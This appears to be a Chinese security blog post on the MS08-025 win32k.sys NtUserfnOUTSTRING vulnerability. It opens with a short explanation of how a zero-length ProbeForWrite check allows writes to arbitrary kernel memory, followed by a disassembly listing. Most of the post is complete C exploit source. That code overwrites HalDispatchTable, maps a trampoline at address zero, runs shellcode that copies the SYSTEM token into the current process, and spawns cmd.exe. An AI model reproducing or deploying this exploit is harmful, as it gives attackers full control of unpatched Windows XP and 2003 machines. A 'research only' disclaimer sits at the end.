|
问题出在ProbeForWrite在处理指定的地址可写时,传入指定的长度为0时就不进行判断,就可以造成指定的地址可写,这样我们就可以写任意的内核空间了,
.text:BF850BB7 push 14h .text:BF850BB9 push offset stru_BF9940D0 .text:BF850BBE call __SEH_prolog .text:BF850BC3 xor edx, edx .text:BF850BC5 mov [ebp+ms_exc.disabled], edx .text:BF850BC8 mov eax, [ebp+var_20] .text:BF850BCB mov ecx, 7FFFFFFFh .text:BF850BD0 and eax, ecx .text:BF850BD2 mov esi, [ebp+arg_18] .text:BF850BD5 shl esi, 1Fh .text:BF850BD8 or eax, esi .text:BF850BDA mov [ebp+var_20], eax .text:BF850BDD mov esi, eax .text:BF850BDF xor esi, [ebp+arg_8] .text:BF850BE2 and esi, ecx .text:BF850BE4 xor eax, esi .text:BF850BE6 mov [ebp+var_20], eax .text:BF850BE9 cmp [ebp+arg_18], edx .text:BF850BEC jnz short loc_BF850BFA .text:BF850BEE lea esi, [eax+eax] //当eax=0x80000000时,esi就会整形溢出为0,这样就触发了可写内核空间 .text:BF850BF1 xor esi, eax .text:BF850BF3 and esi, ecx .text:BF850BF5 xor eax, esi .text:BF850BF7 mov [ebp+var_20], eax .text:BF850BFA .text:BF850BFA loc_BF850BFA: ; CODE XREF: NtUserfnOUTSTRING(x,x,x,x,x,x,x)+35 j .text:BF850BFA mov [ebp+var_24], edx .text:BF850BFD mov esi, [ebp+Address] .text:BF850C00 mov [ebp+var_1C], esi .text:BF850C03 xor ebx, ebx .text:BF850C05 inc ebx .text:BF850C06 push ebx ; Alignment .text:BF850C07 and eax, ecx .text:BF850C09 push eax ; Length //length=0 .text:BF850C0A push esi ; Address .text:BF850C0B call ds:__imp__ProbeForWrite@12 ; ProbeForWrite(x,x,x) .text:BF850C11 or [ebp+ms_exc.disabled], 0FFFFFFFFh .text:BF850C15 mov eax, [ebp+arg_14] .text:BF850C18 add eax, 6 .text:BF850C1B and eax, 1Fh .text:BF850C1E push [ebp+arg_10] .text:BF850C21 lea ecx, [ebp+var_24] .text:BF850C24 push ecx .text:BF850C25 push [ebp+arg_8] .text:BF850C28 push [ebp+arg_4] .text:BF850C2B push [ebp+arg_0] .text:BF850C2E mov ecx, _gpsi .text:BF850C34 call dword ptr [ecx+eax*4+8] .text:BF850C38 mov edi, eax .text:BF850C3A test edi, edi .text:BF850C3C jz loc_BF850B94 .text:BF850C42 .text:BF850C42 loc_BF850C42: ; CODE XREF: NtUserfnOUTSTRING(x,x,x,x,x,x,x)-20 j .text:BF850C42 ; NtUserfnOUTSTRING(x,x,x,x,x,x,x)-A j .text:BF850C42 mov eax, edi .text:BF850C44 call __SEH_epilog .text:BF850C49 retn 1Ch .text:BF850C49 _NtUserfnOUTSTRING@28 endp .text:BF850C49 .text:BF850C4C ; ---------------------------------------------------------
这里是通过覆盖了内核中的 HalDispatchTable表来执行shellcode的
// ms08-25-exploit #1 // This exploit takes advantage of one of the vulnerabilities // patched in the Microsoft Security bulletin MS08-25 // http://www.microsoft.com/technet/security/bulletin/ms08-025.mspx // --------------------------------------- // For research purposes ONLY. // --------------------------------------- // Ruben Santamarta // www.reversemode.com // hi.baidu.com/vessial changed the shellcode
#include "stdafx.h"
typedef enum _KPROFILE_SOURCE {
ProfileTime, ProfileAlignmentFixup, ProfileTotalIssues, ProfilePipelineDry, ProfileLoadInstructions, ProfilePipelineFrozen, ProfileBranchInstructions, ProfileTotalNonissues, ProfileDcacheMisses, ProfileIcacheMisses, ProfileCacheMisses, ProfileBranchMispredictions, ProfileStoreInstructions, ProfileFpInstructions, ProfileIntegerInstructions, Profile2Issue, Profile3Issue, Profile4Issue, ProfileSpecialInstructions, ProfileTotalCycles, ProfileIcacheIssues, ProfileDcacheAccesses, ProfileMemoryBarrierCycles, ProfileLoadLinkedIssues, ProfileMaximum
} KPROFILE_SOURCE, *PKPROFILE_SOURCE;
typedef DWORD (WINAPI *PNTQUERYINTERVAL)( KPROFILE_SOURCE ProfileSource, PULONG Interval );
typedef NTSTATUS (WINAPI *PNTALLOCATE)( IN HANDLE ProcessHandle, IN OUT PVOID *BaseAddress, IN ULONG ZeroBits, IN OUT PULONG RegionSize, IN ULONG AllocationType, IN ULONG Protect );
OSVERSIONINFOEX OsVersionInfo;
_declspec(naked) int ShellCode() { if ( OsVersionInfo.dwMinorVersion == 1 ) {
__asm {
nop nop nop nop nop nop
mov eax,0xFFDFF124 // eax = KPCR (not 3G Mode) Mov eax,[eax]
mov esi,[eax+0x220] mov eax,esi
searchXp:
mov eax,[eax+0x88] sub eax,0x88 mov edx,[eax+0x84] cmp edx,0x4 // Find System Process jne searchXp
mov eax,[eax+0xc8] // 获取system进程的token mov [esi+0xc8],eax // 修改当前进程的token
ret 8
} } if ( OsVersionInfo.dwMinorVersion == 2 ) {
__asm {
nop nop nop nop nop nop
mov eax,0xFFDFF124 // eax = KPCR (not 3G Mode) Mov eax,[eax]
mov esi,[eax+0x220] mov eax,esi
search2003:
mov eax,[eax+0x98] sub eax,0x98 mov edx,[eax+0x94] cmp edx,0x4 // Find System Process jne search2003
mov eax,[eax+0xd8] // 获取system进程的token mov [esi+0xd8],eax // 修改当前进程的token ret 8
} }
} _declspec(naked) ULONG __stdcall NtUserMessageCall ( IN HWND arg1, IN ULONG_PTR arg2, IN ULONG_PTR arg3, IN ULONG_PTR arg4, IN ULONG_PTR arg5, IN ULONG_PTR arg6, IN ULONG_PTR arg7 ) { __asm { mov eax, 000011cch mov edx, 7ffe0300h call dword ptr [edx] retn 1Ch } }
void InitTrampoline() {
PNTALLOCATE NtAllocateVirtualMemory; LPVOID addr = (LPVOID)3; DWORD dwShellSize=0x1000; unsigned char trampoline[]="\x68\x00\x00\x00\x00" //push 0x0 "\xc3"; // retn
NtAllocateVirtualMemory = (PNTALLOCATE) GetProcAddress(GetModuleHandle("ntdll.dll"),"NtAllocateVirtualMemory"); if( !NtAllocateVirtualMemory ) exit(0); NtAllocateVirtualMemory( (HANDLE)-1, &addr, 0, &dwShellSize, MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE );
if( (ULONG_PTR)addr ) { printf("\n[++] Error Allocating memory\n"); exit(0); }
*(ULONG_PTR*)(trampoline+1)=(ULONG_PTR)ShellCode;//push &shellcode // retn 这样就可以直接执行shellcode了 memcpy(NULL,trampoline,sizeof(trampoline)-1); 指 跳转指令写入0x0地址,cool吧,你有做过吗?:) } int Callback_Overview() { printf("\n"); printf("===================================================================== \n"); printf("\t\tMicrosoft Windows XP SP2 - MS08-025 - \n"); printf("\twin32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit \n"); printf("===================================================================== \n"); printf("+ References:\n"); printf(" http://www.microsoft.com/technet/security/bulletin/ms08-025.mspx\n"); printf(" http://www.reversemode.com\n\n"); printf(" http://hi.baidu.com/vessial\n\n"); printf(" vessial just changed the shellcode can get the system token\n"); return 1; }
int main(int argc, char **argv) {
PNTQUERYINTERVAL NtQueryIntervalProfile; KPROFILE_SOURCE stProfile = ProfileTotalIssues;
ULONG_PTR HalDispatchTable; ULONG_PTR BaseNt=0; ULONG_PTR result; HMODULE hKernel; char szNtos[MAX_PATH] = {0};
STARTUPINFOA stStartup; PROCESS_INFORMATION pi;
Callback_Overview(); LoadLibrary("user32.dll");
if( GetDriverInfoByName("krnl",szNtos,&BaseNt) ) { printf("[+] %s loaded at \t [ 0x%p ]\n",szNtos,BaseNt); } else { printf("[!!] Kernel not found :?\n"); return FALSE; }
if( strstr(szNtos,"krnlpa") ) { hKernel = LoadLibraryExA("ntkrnlpa.exe",0,1); } else { hKernel = LoadLibraryExA("ntoskrnl.exe",0,1); }
HalDispatchTable = (ULONG_PTR)GetProcAddress(hKernel, "HalDispatchTable");
if( !HalDispatchTable ) { printf("[!!] HalDispatchTable not found\n"); return FALSE; }
RtlZeroMemory( &OsVersionInfo, sizeof(OsVersionInfo) ); OsVersionInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX); GetVersionEx ((OSVERSIONINFO *) &OsVersionInfo);
if ( OsVersionInfo.dwMajorVersion != 5 ) {
printf( "Not NT5 system\n" ); ExitProcess( 0 ); } //Get Operatiny System Version HalDispatchTable -= ( ULONG_PTR )hKernel; HalDispatchTable += BaseNt;
printf("[+] HalDispatchTable found \t\t\t [ 0x%p ]\n",HalDispatchTable); printf("[+] NtQueryIntervalProfile ");
NtQueryIntervalProfile = ( PNTQUERYINTERVAL ) GetProcAddress( GetModuleHandle("ntdll.dll") ,"NtQueryIntervalProfile"); if( !NtQueryIntervalProfile ) { printf("[!!] Unable to resolve NtQueryIntervalProfile\n"); return FALSE; } printf( "\t\t\t [ 0x%p ]\n",NtQueryIntervalProfile ); InitTrampoline();
NtUserMessageCall( GetDesktopWindow(), 0xD, 0x80000000, HalDispatchTable+sizeof(WORD)+sizeof(ULONG_PTR), 0x0, 0x0, 0x0); NtUserMessageCall( GetDesktopWindow(), 0xD, 0x80000000, HalDispatchTable+sizeof(ULONG_PTR), 0x0, 0x0, 0x0); printf("\n[+] Executing Shellcode...\n"); NtQueryIntervalProfile(stProfile,&result);//call 0x0,真是经典 GetStartupInfo( &stStartup );
CreateProcess( NULL, "cmd.exe", NULL, NULL, TRUE, NULL, NULL, NULL, &stStartup, &pi );
printf("[+] Exiting...\n");
return TRUE; }
技术研究,请勿作非法用途
|